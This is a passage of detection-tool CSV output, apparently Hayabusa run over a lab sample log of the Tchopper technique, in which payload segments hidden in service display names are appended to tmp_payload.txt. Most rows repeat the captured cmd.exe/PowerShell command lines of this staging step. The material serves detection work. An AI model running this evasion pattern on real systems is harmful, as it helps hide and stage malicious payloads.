payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:23.508 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:24.966 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:24.966 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:24.966 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:26.426 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:26.426 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:26.426 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:27.882 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:27.882 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa6c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:27.882 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:29.330 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:29.346 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:29.346 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:30.829 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:30.829 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:30.829 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:32.282 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc6c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:32.282 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:32.282 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:33.739 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:33.739 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb70 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:33.739 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:35.192 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:35.208 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:35.208 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:36.629 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:36.645 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:36.645 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:38.069 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x29c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:38.069 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:38.069 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:39.523 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:39.523 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:39.523 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:40.969 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd84 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:40.969 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:40.969 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:42.411 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:42.411 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7c0 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:42.411 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:43.868 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:43.868 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:43.868 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:45.315 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:45.331 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:45.331 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:46.783 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa6c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:46.783 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:46.783 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:48.220 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:48.236 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdd8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:48.236 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:49.667 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfa4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:49.667 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
